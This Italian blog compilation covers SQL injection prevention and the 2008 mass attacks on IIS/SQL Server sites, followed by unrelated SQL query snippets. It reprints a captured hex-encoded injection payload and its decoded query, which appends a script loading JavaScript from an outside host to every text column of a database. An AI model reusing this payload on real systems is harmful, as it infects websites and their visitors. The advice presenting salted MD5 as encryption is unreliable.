Prevenire le Sql Injection

Quando un utente malizioso interagisce con il nostro software, si mette alla ricerca dei punti deboli e tenta di rompere il sistema proprio lì; perciò, possiamo affermare che un sistema è tanto sicuro quanto è sicura la sua parte più debole.

Andiamo dunque ad esaminare tutte le componenti da mettere in sicurezza; le operazioni consigliate possono sembrare molto semplici ma, forse per disattenzione, forse per la fretta di rilasciare un prodotto, non sempre vengono effettuate (ed il recente boom di infezioni lo dimostra).

Conosci i tuoi dati

Se un’applicazione web richiede all’utente di scegliere ad es. una data, è bene validare tipo, lunghezza, formato e range client-side (in JavaScript) e server-side.

Prima del viaggio verso il lato server, è bene filtrare i dati per aggiungere caratteri di escape a caratteri che hanno un significato speciale in SQL, ad es. l’apostrofo. Tenere presente che questi filtri non hanno effetto sugli attacchi che impiegano caratteri ASCII in esadecimale; in tal caso, la difesa dovrà avvenire più in profondità.

Se poi il dato che viaggia è sensibile (ad es. informazioni sugli utenti, specialmente se finanziarie) criptarlo è d’obbligo, ad es. tramite un salted hash, ad es. MD5.

Conosci i tuoi utenti

Assegnare agli utenti del database i privilegi strettamente necessari: un’applicazione web che si connette ad un db usando l’account dell’amministratore da’ all’attaccante il potenziale di eseguire qualunque comando.

Inoltre, se l’attaccante riesce ad agire fuori dei confini del db (ad es. usando la procedura xp_cmdshell), potrebbe acquisire accesso illimitato alla macchina che ospita SQL Server. Infatti, quando un’istanza di SQL Server viene installata, viene creato un servizio in esecuzione in background (che processa i comandi dalle applicazioni ad esso connesse) appartenente all’account di sistema locale (il più potente su una macchina Windows, persino più potente dell’account amministrativo). Perciò, Microsoft raccomanda che durante l’installazione di SQL Server il server venga eseguito da un account che possa accedere soltanto alle risorse strettamente necessarie.

Approfondimenti:
Sql Injection

Ecco un esempio di Sql injection per SQL Server, che viene aggiunta alla fine di una URL dinamica. Ovviamente effettuare tale procedura è illegale: don’t try this at home!

Il codice da iniettare nell’URL dinamica.

DECLARE @S VARCHAR(4000);SET
@S=CAST(0x4445434C415245204054205641524348415228323535292C
404320564152434841522832353529204445434C415245205461626C655
F437572736F7220435552534F5220464F522053454C45435420612E6E6
16D652C622E6E616D652046524F4D207379736F626A6563747320612C7
37973636F6C756D6E73206220574845524520612E69643D622E6964204
14E4420612E78747970653D27752720414E442028622E78747970653D39
39204F5220622E78747970653D3335204F5220622E78747970653D3233
31204F5220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D205461626C655F
437572736F7220494E544F2040542C4043205748494C45284040464554
43485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B404
32B275D29292B27273C736372697074207372633D687474703A2F2F7777
772E61647739352E636F6D2F622E6A733E3C2F7363726970743E272727
29204645544348204E4558542046524F4D205461626C655F437572736F
7220494E544F2040542C404320454E4420434C4F5345205461626C655
F437572736F72204445414C4C4F43415445205461626C655F437572736
F7220 AS VARCHAR(4000));
EXEC(@S)

Si tratta di una injection utilizzata durante un attacco reale ad un noto sito italiano ed a molti altri siti in rete.

Come vedete, prima si dichiara una variabile, poi la si inizializza con il valore 0x4445434C41524520…ma cosa significa? Si tratta di un valore espresso nel sistema numerico esadecimale (identificato dal prefisso ‘0x’), che dopo il cast in varchar svela la sua vera natura: è una query per Sql Server.

La Query che verrà eseguita.

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''< scri pt src=http://www.ad w95.com/b.js>‘'’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Questa query modifica tutte le colonne del database, aggiungendo il seguente script:

< scri pt src=http://www.ad w95.com/b.js>

Che, stampato nelle pagine dei siti compromessi, sfrutterà eventuali bug del browser del malcapitato utente.

Disclaimer.

Tutte le informazioni e le tecniche sono state descritte solo per fini educativi e qualsiasi uso malizioso di queste informazioni è illegale e fortemente scoraggiato.

Approfondimenti:
Lo stesso attacco è stato rilevato da blazo
Sql Injection

Il web, ultima settimana di Aprile 2008.

Si osserva un picco di attacchi di tipo SQL Injection provenienti da server farm cinesi. Circa mezzo milione di pagine web residenti su server su cui girano le tecnologie IIS, ASP e SQL Server vengono infettate.

Microsoft precisa che gli aggressori non hanno sfruttato falle, vecchie o nuove, contenute nei propri software, ma hanno approfittato di alcuni dei più comuni errori compiuti dagli amministratori nella configurazione dei siti web e dei database.

La figura (ottenuta tramite Google Trends) mostra l’andamento del numero di ricerche della query [SQL Injection], insieme al volume di news correlate. E’ evidente l’interesse per l’argomento che si è sviluppato a causa degli attacchi dell’ultimo periodo.

La situazione attuale.

Da circa una settimana gli esperti di sicurezza stanno registrando una nuova ondata di attacchi. Come in passato, gli aggressori si avvalgono dei risultati di Google per automatizzare la ricerca di computer vulnerabili.

La società di sicurezza Armorize Technology stima che, solo nell’ultima settimana, i cracker cinesi hanno compromesso almeno 10mila server Windows e centinaia di migliaia di pagine web. Per avere un’idea del numero di siti recentemente compromessi, provate a cercare banner82 su Google.com.

Ma come è fatto un tipico attacco?

Grazie alla collaborazione di un mio collega che mi ha gentilmente messo a disposizione i dati raccolti da un sistema che ha sviluppato (in grado di riconoscere e memorizzare gli attacchi), domani pubblicherò un esempio di una query utilizzata durante un attacco reale verso $noto_sito_italiano.

Approfondimenti:
Bot cinesi infettano migliaia di server
Come fare una Sql Injection su Sql Server
Come evitare le Sql Injection

Immaginiamo di:
- aver impostato una tabella con un campo data [tipo di dato: datetime, lunghezza: 8, ammetti NULL: si, valore predefinito: getdate()]
- voler estrarre dati generati in un determinato intervallo di tempo (ad esempio il mese di novembre 2oo5)

Ecco una possibile soluzione al problema:

SELECT *
FROM tabella_stats
WHERE (data >= CAST(’051101′ AS datetime)) AND (data < = CAST('051130' AS datetime))

Ho 2 tabelle: europa_ospitalita ed europa_generale. Solo la seconda tabella è dotata di id.
La prima contiene il nome della città nella colonna citta, la seconda nella colonna nome.

Supponiamo che io voglia collegare le tabelle tramite un campo id, piuttosto che attraverso un campo di testo.
La query che ho usato è la seguente, che aggiorna la colonna id della tabella europa_ospitalita.

update europa_ospitalita
set id=g.id
from europa_ospitalita o, europa_generale g
where o.citta = g.nome